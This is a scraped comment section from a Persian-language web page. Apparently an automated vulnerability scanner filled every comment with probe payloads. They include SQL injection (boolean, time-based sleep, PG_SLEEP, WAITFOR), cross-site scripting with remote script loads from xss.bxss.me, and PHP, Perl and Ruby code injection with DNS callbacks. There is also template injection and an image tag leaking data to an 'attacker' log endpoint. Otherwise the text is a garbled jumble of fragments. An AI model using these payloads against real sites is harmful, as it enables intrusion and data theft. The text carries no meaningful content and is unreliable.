  -1' OR 2+280-280-1=0+0+0+1 --

  Mr.
  1402/04/29 10:19

  -1' OR 2+193-193-1=0+0+0+1 or 'zNNz5zHF'='

  Mr.
  1402/04/29 10:19

  -1" OR 2+65-65-1=0+0+0+1 --

  Mr.
  1402/04/29 10:19

  &#xD;&#xA;

  Mr.
  1402/04/29 10:20

  '"()

  Mr.
  1402/04/29 10:20

  &#xD;&#xA;'&&sleep(27*1000)*oexowo&&'

  Mr.
  1402/04/29 10:20

  &#xD;&#xA;"&&sleep(27*1000)*usiuka&&"

  Mr.
  1402/04/29 10:20

  &#xD;&#xA;'||sleep(27*1000)*uyetqo||'

  Mr.
  1402/04/29 10:20

  &#xD;&#xA;"||sleep(27*1000)*pkrqsr||"

  Mr.
  1402/04/29 10:20

  '.gethostbyname(lc('hitsv'.'aqgvhktd4c50d.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(112).chr(87).chr(114).chr(75).'

  Mr.
  1402/04/29 10:20

  ".gethostbyname(lc("hitqh"."qrihousl61119.bxss.me."))."A".chr(67).chr(hex("58")).chr(121).chr(84).chr(100).chr(70)."

  '.gethostbyname(lc('hitzr'.'iifzcdti1e0ef.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(97).chr(69).chr(116).chr(82).'
  1402/04/29 10:20

  &#xD;&#xA;

  Mr.
  1402/04/29 10:20

  ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

  ".gethostbyname(lc("hitez"."bvtylrkf9f39e.bxss.me."))."A".chr(67).chr(hex("58")).chr(99).chr(77).chr(116).chr(74)."
  1402/04/29 10:20

  &#xD;&#xA;

  Mr.
  1402/04/29 10:20

  ';print(md5(31337));$a='

  Mr.
  1402/04/29 10:20

  ";print(md5(31337));$a="

  Mr.
  1402/04/29 10:20

  ${@print(md5(31337))}

  Mr.
  1402/04/29 10:20

  ${@print(md5(31337))}\

  Mr.
  1402/04/29 10:20

  ctime
  sleep
  p0
  (I30
  tp1
  Rp2
  .

  Mr.
  1402/04/29 10:20

  '.print(md5(31337)).'

  Mr.
  1402/04/29 10:20

  HttP://bxss.me/t/xss.html?%00

  ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
  1402/04/29 10:20

  &#xD;&#xA;

  Mr.
  1402/04/29 10:20

  bxss.me/t/xss.html?%00

  ';print(md5(31337));$a='
  1402/04/29 10:20

  &#xD;&#xA;

  HttP://bxss.me/t/xss.html?%00
  1402/04/29 10:20

  &#xD;&#xA;

  ";print(md5(31337));$a="
  1402/04/29 10:20

  &#xD;&#xA;

  bxss.me/t/xss.html?%00
  1402/04/29 10:20

  &#xD;&#xA;

  ${@print(md5(31337))}
  1402/04/29 10:20

  &#xD;&#xA;

  ${@print(md5(31337))}\
  1402/04/29 10:20

  &#xD;&#xA;

  '.print(md5(31337)).'
  1402/04/29 10:20

  &#xD;&#xA;

  Mr.
  1402/04/29 10:20

  &#xD;&#xA;

  '"()
  1402/04/29 10:20

  &#xD;&#xA;

  Mr.'&&sleep(27*1000)*fdcrjv&&'
  1402/04/29 10:20

  &#xD;&#xA;

  Mr."&&sleep(27*1000)*syylep&&"
  1402/04/29 10:20

  &#xD;&#xA;

  Mr.'||sleep(27*1000)*jnvqrc||'
  1402/04/29 10:20

  &#xD;&#xA;

  Mr."||sleep(27*1000)*zdmfyk||"
  1402/04/29 10:20

  &#xD;&#xA;

  Mr.
  1402/04/29 10:20

  &#xD;&#xA;

  Mr.
  1402/04/29 10:20

  "+"A".concat(70-3).concat(22*4).concat(104).concat(75).concat(102).concat(74)+(require"socket"
  Socket.gethostbyname("hitdh"+"ayqtbkgp185a8.bxss.me.")[3].to_s)+"

  Mr.
  1402/04/29 10:20

  '+'A'.concat(70-3).concat(22*4).concat(118).concat(65).concat(117).concat(74)+(require'socket'
  Socket.gethostbyname('hitfs'+'qkbwzwkc480fd.bxss.me.')[3].to_s)+'

  "+"A".concat(70-3).concat(22*4).concat(102).concat(77).concat(114).concat(71)+(require"socket" Socket.gethostbyname("hitlj"+"cjfstztfadfa2.bxss.me.")[3].to_s)+"
  1402/04/29 10:20

  &#xD;&#xA;

  '+'A'.concat(70-3).concat(22*4).concat(115).concat(65).concat(100).concat(73)+(require'socket' Socket.gethostbyname('hitsv'+'mnpqunqh13258.bxss.me.')[3].to_s)+'
  1402/04/29 10:20

  &#xD;&#xA;

  Mr.
  1402/04/29 10:20

  %D8%B4%D8%B1%DA%A9%D8%AA-%D9%84%D9%88%DA%A9%D8%A7%D8%B1%D8%AA

  Mr.
  1402/04/29 10:20

  %D8%B4%D8%B1%DA%A9%D8%AA-%D9%84%D9%88%DA%A9%D8%A7%D8%B1%D8%AA

  Mr.
  1402/04/29 10:20

  %D8%B4%D8%B1%DA%A9%D8%AA-%D9%84%D9%88%DA%A9%D8%A7%D8%B1%D8%AA/.

  %D8%B4%D8%B1%DA%A9%D8%AA-%D9%84%D9%88%DA%A9%D8%A7%D8%B1%D8%AA
  1402/04/29 10:20

  &#xD;&#xA;

  %D8%B4%D8%B1%DA%A9%D8%AA-%D9%84%D9%88%DA%A9%D8%A7%D8%B1%D8%AA�
  1402/04/29 10:20

  &#xD;&#xA;

  %D8%B4%D8%B1%DA%A9%D8%AA-%D9%84%D9%88%DA%A9%D8%A7%D8%B1%D8%AA/.
  1402/04/29 10:20

  &#xD;&#xA;

  Mr.
  1402/04/29 10:20

  &#xD;&#xA;

  Mr.
  1402/04/29 10:20

  &#xD;&#xA;

  Mr.
  1402/04/29 10:20

  )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

  )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
  1402/04/29 10:20

  &#xD;&#xA;

  Mr.
  1402/04/29 10:20

  if(now()=sysdate(),sleep(15),0)

  Mr.
  1402/04/29 10:20

  xfs.bxss.me

  xfs.bxss.me
  1402/04/29 10:20

  &#xD;&#xA;

  Mr.
  1402/04/29 10:20

  &#xD;&#xA;

  Mr.
  1402/04/29 10:20

  &#xD;&#xA;

  Mr.
  1402/04/29 10:20

  &#xD;&#xA;

  Mr.
  1402/04/29 10:20

  &#xD;&#xA;

  Mr.
  1402/04/29 10:20

  '"

  Mr.
  1402/04/29 10:20

  <!--

  '"
  1402/04/29 10:20

  &#xD;&#xA;

  <!--
  1402/04/29 10:20

  &#xD;&#xA;

  Mr.
  1402/04/29 10:20

  &#xD;&#xA;'"()&%<zzz><ScRiPt >UQEh(9458)</ScRiPt>

  Mr.
  1402/04/29 10:20

  '"()&%<zzz><ScRiPt >UQEh(9047)</ScRiPt>

  Mr.
  1402/04/29 10:20

  &#xD;&#xA;9781257

  Mr.
  1402/04/29 10:21

  bfg5785<s1﹥s2ʺs3ʹhjl5785

  Mr.
  1402/04/29 10:21

  555'"()&%<zzz><ScRiPt >9PZ0(9133)</ScRiPt>

  Mr.
  1402/04/29 10:21

  bfgx8566%C0%BEz1%C0%BCz2a%90bcxhjl8566

  Mr.
  1402/04/29 10:21

  &#xD;&#xA;

  Mr.
  1402/04/29 10:21

  '"()&%<zzz><ScRiPt >9PZ0(9633)</ScRiPt>

  Mr.
  1402/04/29 10:21

  <%={{={@{#{${dfb}}%>

  Mr.
  1402/04/29 10:21

  &#xD;&#xA;

  Mr.
  1402/04/29 10:21

  5559630816

  Mr.
  1402/04/29 10:21

  <th:t="${dfb}#foreach

  Mr.
  1402/04/29 10:21

  &#xD;&#xA;

  Mr.'"()&%<zzz><ScRiPt >lGnM(9286)</ScRiPt>
  1402/04/29 10:21

  555

  Mr.
  1402/04/29 10:21

  1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

  Mr.
  1402/04/29 10:21

  &#xD;&#xA;

  '"()&%<zzz><ScRiPt >lGnM(9013)</ScRiPt>
  1402/04/29 10:21

  555

  Mr.
  1402/04/29 10:21

  dfb{{98991*97996}}xca

  Mr.
  1402/04/29 10:21

  0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

  Mr.
  1402/04/29 10:21

  &#xD;&#xA;

  Mr.9667516
  1402/04/29 10:21

  555

  Mr.
  1402/04/29 10:21

  dfb[[${98991*97996}]]xca

  Mr.
  1402/04/29 10:21

  &#xD;&#xA;

  Mr.
  1402/04/29 10:21

  dfb__${98991*97996}__::.x

  Mr.
  1402/04/29 10:21

  "dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

  Mr.
  1402/04/29 10:21

  &#xD;&#xA;<ScRiPt >UQEh(9135)</ScRiPt>

  Mr.
  1402/04/29 10:21

  &#xD;&#xA;<WBC2ED>YKHCJ[!+!]</WBC2ED>

  Mr.
  1402/04/29 10:22

  0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

  Mr.
  1402/04/29 10:22

  &#xD;&#xA;<ScRiPt
  >UQEh(9028)</ScRiPt>

  Mr.
  1402/04/29 10:22

  &#xD;&#xA;<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9254></ScRiPt>

  Mr.
  1402/04/29 10:22

  &#xD;&#xA;<ScRiPt
  >UQEh(9765)</ScRiPt>

  Mr.
  1402/04/29 10:22

  &#xD;&#xA;<svg  

  %A0onload=UQEh(9140);>

  Mr.
  1402/04/29 10:22

  &#xD;&#xA;<isindex type=image src=1 onerror=UQEh(9085)>

  Mr.
  1402/04/29 10:22

  &#xD;&#xA;<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9878'>

  Mr.
  1402/04/29 10:22

  &#xD;&#xA;<body onload=UQEh(9382)>

  Mr.
  1402/04/29 10:22

  &#xD;&#xA;<img src=//xss.bxss.me/t/dot.gif onload=UQEh(9107)>

  Mr.
  1402/04/29 10:22

  &#xD;&#xA;<img src=xyz OnErRor=UQEh(9027)>

  Mr.
  1402/04/29 10:22

  (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

  Mr.
  1402/04/29 10:22

  &#xD;&#xA;<img/src=">" onerror=alert(9742)>

  Mr.
  1402/04/29 10:22

  %0D%0A%26%23%78%44%3B%26%23%78%41%3B%3C%53%63%52%69%50%74%20%3E%55%51%45%68%289207%29%3C%2F%73%43%72%69%70%54%3E

  Mr.
  1402/04/29 10:22

  &#xD;&#xA;&lt;ScRiPt&gt;UQEh(9054)&lt;/sCripT&gt;

  Mr.
  1402/04/29 10:22

  %F6<img zzz onmouseover=UQEh(92131) //%F6>

  Mr.
  1402/04/29 10:23

  &#xD;&#xA;<input autofocus onfocus=UQEh(9161)>

  Mr.
  1402/04/29 10:23

  <a HrEF=http://xss.bxss.me></a>

  Mr.
  1402/04/29 10:23

  <a HrEF=jaVaScRiPT:>

  Mr.
  1402/04/29 10:23

  1 waitfor delay '0:0:15' --

  Mr.
  1402/04/29 10:23

  &#xD;&#xA;}body{zzz:Expre/**/SSion(UQEh(9595))}

  Mr.
  1402/04/29 10:23

  &#xD;&#xA;4dGgY
  <ScRiPt >UQEh(9257)</ScRiPt>

  Mr.
  1402/04/29 10:23

  &#xD;&#xA;<WDA6XV>AJMUY[!+!]</WDA6XV>

  Mr.
  1402/04/29 10:23

  &#xD;&#xA;<ifRAme sRc=9231.com></IfRamE>

  Mr.
  1402/04/29 10:23

  &#xD;&#xA;<anI2Sm3 x=9961>

  Mr.
  1402/04/29 10:23

  &#xD;&#xA;<img sRc='http://attacker-9438/log.php?

  Mr.
  1402/04/29 10:23

  &#xD;&#xA;<aDQ3Pk2<

  Mr.'"()&%<zzz><ScRiPt >UQEh(9376)</ScRiPt>
  1402/04/29 10:23

  &#xD;&#xA;

  '"()&%<zzz><ScRiPt >UQEh(9341)</ScRiPt>
  1402/04/29 10:23

  &#xD;&#xA;

  Mr.
  1402/04/29 10:23

  PrMGk7qX'; waitfor delay '0:0:15' --

  Mr.9532198
  1402/04/29 10:23

  &#xD;&#xA;

  bfg7517<s1﹥s2ʺs3ʹhjl7517
  1402/04/29 10:23

  &#xD;&#xA;

  bfgx6626%C0%BEz1%C0%BCz2a%90bcxhjl6626
  1402/04/29 10:23

  &#xD;&#xA;

  <%={{={@{#{${dfb}}%>
  1402/04/29 10:23

  &#xD;&#xA;

  <th:t="${dfb}#foreach
  1402/04/29 10:24

  &#xD;&#xA;

  1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
  1402/04/29 10:24

  &#xD;&#xA;

  dfb{{98991*97996}}xca
  1402/04/29 10:24

  &#xD;&#xA;

  dfb[[${98991*97996}]]xca
  1402/04/29 10:24

  &#xD;&#xA;

  Mr.
  1402/04/29 10:24

  vArJeC2O' OR 406=(SELECT 406 FROM PG_SLEEP(15))--

  dfb__${98991*97996}__::.x
  1402/04/29 10:24

  &#xD;&#xA;

  "dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
  1402/04/29 10:24

  &#xD;&#xA;

  Mr.<ScRiPt >UQEh(9775)</ScRiPt>
  1402/04/29 10:24

  &#xD;&#xA;

  Mr.<W0AJWD>FWDNW[!+!]</W0AJWD>
  1402/04/29 10:24

  &#xD;&#xA;

  Mr.<script>UQEh(9512)</script>
  1402/04/29 10:24

  &#xD;&#xA;

  Mr.<ScR<ScRiPt>IpT>UQEh(9347)</sCr<ScRiPt>IpT>
  1402/04/29 10:24

  &#xD;&#xA;

  Mr.<ScRiPt >UQEh(9187)</ScRiPt>
  1402/04/29 10:24

  &#xD;&#xA;

  Mr.<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9105></ScRiPt>
  1402/04/29 10:24

  &#xD;&#xA;

  Mr.<�ScRiPt >UQEh(9026)</ScRiPt>
  1402/04/29 10:24

  &#xD;&#xA;

  Mr.<svg %A0�onload=UQEh(9000);>
  1402/04/29 10:24

  &#xD;&#xA;

  Mr.
  1402/04/29 10:24

  pnvn8m6d') OR 591=(SELECT 591 FROM PG_SLEEP(15))--

  Mr.<isindex type=image src=1 onerror=UQEh(9076)>
  1402/04/29 10:24

  &#xD;&#xA;

  Mr.<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9409'>
  1402/04/29 10:25

  &#xD;&#xA;

  Mr.<body onload=UQEh(9864)>
  1402/04/29 10:25

  &#xD;&#xA;

  Mr.<img src=//xss.bxss.me/t/dot.gif onload=UQEh(9142)>
  1402/04/29 10:25

  &#xD;&#xA;

  Mr.<img src=xyz OnErRor=UQEh(9471)>
  1402/04/29 10:25

  &#xD;&#xA;

  Mr.<img/src=">" onerror=alert(9602)>
  1402/04/29 10:25

  &#xD;&#xA;

  %4D%72%2E%3C%53%63%52%69%50%74%20%3E%55%51%45%68%289167%29%3C%2F%73%43%72%69%70%54%3E
  1402/04/29 10:25

  &#xD;&#xA;

  Mr.
  1402/04/29 10:25

  a35RTLDd')) OR 302=(SELECT 302 FROM PG_SLEEP(15))--

  Mr.\u003CScRiPt\UQEh(9848)\u003C/sCripT\u003E
  1402/04/29 10:25

  &#xD;&#xA;

  Mr.&lt;ScRiPt&gt;UQEh(9129)&lt;/sCripT&gt;
  1402/04/29 10:25

  &#xD;&#xA;

  %F6<img zzz onmouseover=UQEh(94111) //%F6>
  1402/04/29 10:25

  &#xD;&#xA;

  Mr.<input autofocus onfocus=UQEh(9069)>
  1402/04/29 10:25

  &#xD;&#xA;

  <a HrEF=http://xss.bxss.me></a>
  1402/04/29 10:25

  &#xD;&#xA;

  <a HrEF=jaVaScRiPT:>
  1402/04/29 10:25

  &#xD;&#xA;

  Mr.}body{zzz:Expre/**/SSion(UQEh(9058))}
  1402/04/29 10:25

  &#xD;&#xA;

  Mr.CRWm2 <ScRiPt >UQEh(9809)</ScRiPt>
  1402/04/29 10:25

  &#xD;&#xA;

  Mr.<W5HDH1>DYDQB[!+!]</W5HDH1>
  1402/04/29 10:25

  &#xD;&#xA;

  Mr.
  1402/04/29 10:25

  &#xD;&#xA;'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

  Mr.
  1402/04/29 10:25

  1'"

  Mr.
  1402/04/29 10:25

  1%C0%A7%C0%A2%2527%2522

  Mr.
  1402/04/29 10:25

  @@AITrY

  Mr.<ifRAme sRc=9644.com></IfRamE>
  1402/04/29 10:25

  &#xD;&#xA;

  Mr.<aE1oPFH x=9904>
  1402/04/29 10:26

  &#xD;&#xA;

  Mr.<img sRc='http://attacker-9594/log.php?
  1402/04/29 10:26

  &#xD;&#xA;

  Mr.<aaleArx<
  1402/04/29 10:26

  &#xD;&#xA;

  Mr.
  1402/04/29 10:26

  &#xD;&#xA;

  Mr.
  1402/04/29 10:26

  &#xD;&#xA;

  Mr.
  1402/04/29 10:26

  &#xD;&#xA;

  Mr.
  1402/04/29 10:26

  &#xD;&#xA;

  -1 OR 2+147-147-1=0+0+0+1 --
  1402/04/29 10:26

  &#xD;&#xA;

  -1 OR 2+380-380-1=0+0+0+1
  1402/04/29 10:26

  &#xD;&#xA;

  -1' OR 2+981-981-1=0+0+0+1 --
  1402/04/29 10:26

  &#xD;&#xA;

  -1' OR 2+730-730-1=0+0+0+1 or 'v4MHu6Lb'='
  1402/04/29 10:27

  &#xD;&#xA;

  -1" OR 2+167-167-1=0+0+0+1 --
  1402/04/29 10:27

  &#xD;&#xA;

  if(now()=sysdate(),sleep(15),0)
  1402/04/29 10:27

  &#xD;&#xA;

  0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
  1402/04/29 10:27

  &#xD;&#xA;

  0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
  1402/04/29 10:28

  &#xD;&#xA;

  (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
  1402/04/29 10:29

  &#xD;&#xA;

  1 waitfor delay '0:0:15' --
  1402/04/29 10:29

  &#xD;&#xA;

  D5pZw2YW'; waitfor delay '0:0:15' --
  1402/04/29 10:29

  &#xD;&#xA;

  L2QRIFxv' OR 251=(SELECT 251 FROM PG_SLEEP(15))--
  1402/04/29 10:30

  &#xD;&#xA;

  64GZSMaT') OR 718=(SELECT 718 FROM PG_SLEEP(15))--
  1402/04/29 10:30

  &#xD;&#xA;

  Iy5QfuoL')) OR 936=(SELECT 936 FROM PG_SLEEP(15))--
  1402/04/29 10:31

  &#xD;&#xA;

  Mr.'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
  1402/04/29 10:31

  &#xD;&#xA;

  1'"
  1402/04/29 10:31

  &#xD;&#xA;

  1�%C0%A7%C0%A2%2527%2522
  1402/04/29 10:31

  &#xD;&#xA;

  @@mNnLq
  1402/04/29 10:31

  &#xD;&#xA;

  Mr.
  1402/04/29 10:32

  &#xD;&#xA;

  Mr.
  1402/04/29 10:32

  &#xD;&#xA;

  Mr.
  1402/04/29 10:37

  &#xD;&#xA;

  Mr.
  1402/04/29 10:37

  &#xD;&#xA;

  Mr.
  1402/04/29 10:44

  &#xD;&#xA;

  Mr.
  1402/04/29 11:45

  555'"()&%<zzz><ScRiPt >cJCv(9835)</ScRiPt>

  Mr.'"()&%<zzz><ScRiPt >YY4g(9169)</ScRiPt>
  1402/04/29 11:45

  555

  Mr.
  1402/04/29 11:45

  '"()&%<zzz><ScRiPt >cJCv(9524)</ScRiPt>

  '"()&%<zzz><ScRiPt >YY4g(9353)</ScRiPt>
  1402/04/29 11:45

  555

  Mr.
  1402/04/29 11:46

  5559488713

  Mr.9404138
  1402/04/29 11:46

  555

  Mr.
  1402/04/29 11:46

  bfg5663<s1﹥s2ʺs3ʹhjl5663

  bfg5499<s1﹥s2ʺs3ʹhjl5499
  1402/04/29 11:46

  555

  Mr.
  1402/04/29 11:46

  bfgx3490%C0%BEz1%C0%BCz2a%90bcxhjl3490

  bfgx7910%C0%BEz1%C0%BCz2a%90bcxhjl7910
  1402/04/29 11:46

  555

  Mr.
  1402/04/29 11:46

  <%={{={@{#{${dfb}}%>

  <%={{={@{#{${dfb}}%>
  1402/04/29 11:46

  555

  Mr.
  1402/04/29 11:46

  <th:t="${dfb}#foreach

  <th:t="${dfb}#foreach
  1402/04/29 11:46

  555

  Mr.
  1402/04/29 11:46

  1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

  1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
  1402/04/29 11:46

  555

  Mr.
  1402/04/29 11:46

  dfb{{98991*97996}}xca

  dfb{{98991*97996}}xca
  1402/04/29 11:46

  555

  Mr.
  1402/04/29 11:46

  dfb[[${98991*97996}]]xca

  dfb[[${98991*97996}]]xca
  1402/04/29 11:47

  555

  Mr.
  1402/04/29 11:47

  dfb__${98991*97996}__::.x

  dfb__${98991*97996}__::.x
  1402/04/29 11:47

  555

  Mr.
  1402/04/29 11:47

  "dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

  "dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
  1402/04/29 11:47

  555

  Mr.
  1402/04/29 11:47

  555<ScRiPt >cJCv(9315)</ScRiPt>

  Mr.<ScRiPt >YY4g(9480)</ScRiPt>
  1402/04/29 11:47

  555

  Mr.
  1402/04/29 11:47

  555<WNZNTX>GX18O[!+!]</WNZNTX>

  Mr.<WXDZBL>AR693[!+!]</WXDZBL>
  1402/04/29 11:47

  555

  Mr.
  1402/04/29 11:47

  555<script>cJCv(9412)</script>

  Mr.<script>YY4g(9597)</script>
  1402/04/29 11:47

  555

  Mr.
  1402/04/29 11:47

  555<ScR<ScRiPt>IpT>cJCv(9382)</sCr<ScRiPt>IpT>

  Mr.<ScR<ScRiPt>IpT>YY4g(9757)</sCr<ScRiPt>IpT>
  1402/04/29 11:47

  555

  Mr.
  1402/04/29 11:47

  555<ScRiPt
  >cJCv(9971)</ScRiPt>

  Mr.<ScRiPt >YY4g(9130)</ScRiPt>
  1402/04/29 11:47

  555

  Mr.
  1402/04/29 11:47

  555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9684></ScRiPt>

  Mr.<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9029></ScRiPt>
  1402/04/29 11:48

  555

  Mr.
  1402/04/29 11:48

  555<ScRiPt
  >cJCv(9304)</ScRiPt>

  Mr.<�ScRiPt >YY4g(9700)</ScRiPt>
  1402/04/29 11:48

  555

  Mr.
  1402/04/29 11:48

  555<svg  

  %A0onload=cJCv(9074);>

  Mr.<svg %A0�onload=YY4g(9171);>
  1402/04/29 11:48

  555

  Mr.
  1402/04/29 11:48

  555<isindex type=image src=1 onerror=cJCv(9467)>

  Mr.<isindex type=image src=1 onerror=YY4g(9615)>
  1402/04/29 11:48

  555

  Mr.
  1402/04/29 11:48

  555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9349'>

  Mr.<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9035'>
  1402/04/29 11:48

  555

  Mr.
  1402/04/29 11:48

  555<body onload=cJCv(9816)>

  Mr.<body onload=YY4g(9311)>
  1402/04/29 11:48

  555

  Mr.
  1402/04/29 11:48

  555<img src=//xss.bxss.me/t/dot.gif onload=cJCv(9320)>

  Mr.<img src=//xss.bxss.me/t/dot.gif onload=YY4g(9326)>
  1402/04/29 11:48

  555

  Mr.
  1402/04/29 11:48

  555<img src=xyz OnErRor=cJCv(9647)>

  Mr.
  1402/04/29 11:48

  555<img/src=">" onerror=alert(9303)>

  Mr.<img src=xyz OnErRor=YY4g(9202)>
  1402/04/29 11:48

  555

  Mr.
  1402/04/29 11:49

  %35%35%35%3C%53%63%52%69%50%74%20%3E%63%4A%43%76%289884%29%3C%2F%73%43%72%69%70%54%3E

  Mr.<img/src=">" onerror=alert(9988)>
  1402/04/29 11:49

  555

  Mr.
  1402/04/29 11:49

  555\u003CScRiPt\cJCv(9850)\u003C/sCripT\u003E

  %4D%72%2E%3C%53%63%52%69%50%74%20%3E%59%59%34%67%289475%29%3C%2F%73%43%72%69%70%54%3E
  1402/04/29 11:49

  555

  Mr.
  1402/04/29 11:49

  555&lt;ScRiPt&gt;cJCv(9575)&lt;/sCripT&gt;

  Mr.\u003CScRiPt\YY4g(9304)\u003C/sCripT\u003E
  1402/04/29 11:49

  555

  Mr.
  1402/04/29 11:49

  %F6<img zzz onmouseover=cJCv(99111) //%F6>

  Mr.&lt;ScRiPt&gt;YY4g(9110)&lt;/sCripT&gt;
  1402/04/29 11:49

  555

  Mr.
  1402/04/29 11:49

  555<input autofocus onfocus=cJCv(9979)>

  %F6<img zzz onmouseover=YY4g(96801) //%F6>
  1402/04/29 11:49

  555

  Mr.
  1402/04/29 11:49

  <a HrEF=http://xss.bxss.me></a>

  Mr.<input autofocus onfocus=YY4g(9916)>
  1402/04/29 11:49

  555

  Mr.
  1402/04/29 11:49

  <a HrEF=jaVaScRiPT:>

  <a HrEF=http://xss.bxss.me></a>
  1402/04/29 11:49

  555

  Mr.
  1402/04/29 11:49

  555}body{zzz:Expre/**/SSion(cJCv(9558))}

  <a HrEF=jaVaScRiPT:>
  1402/04/29 11:49

  555

  Mr.
  1402/04/29 11:50

  555xdkb9
  <ScRiPt >cJCv(9023)</ScRiPt>

  Mr.}body{zzz:Expre/**/SSion(YY4g(9980))}
  1402/04/29 11:50

  555

  Mr.
  1402/04/29 11:50

  555<WJDSRL>9XBRI[!+!]</WJDSRL>

  Mr.6pso1 <ScRiPt >YY4g(9945)</ScRiPt>
  1402/04/29 11:50

  555

  Mr.
  1402/04/29 11:50

  555<ifRAme sRc=9445.com></IfRamE>

  Mr.<WS7SCE>AYCAS[!+!]</WS7SCE>
  1402/04/29 11:50

  555

  Mr.
  1402/04/29 11:50

  555<az1CFy7 x=9004>

  Mr.<ifRAme sRc=9229.com></IfRamE>
  1402/04/29 11:50

  555

  Mr.
  1402/04/29 11:50

  555<img sRc='http://attacker-9806/log.php?

  Mr.<aBQhNR6 x=9175>
  1402/04/29 11:50

  555

  Mr.
  1402/04/29 11:50

  555<aK4T0Px<

  Mr.<img sRc='http://attacker-9481/log.php?
  1402/04/29 11:50

  555

  Mr.<anLvhd7<
  1402/04/29 11:51

  555

  نظر خود را درج نمایید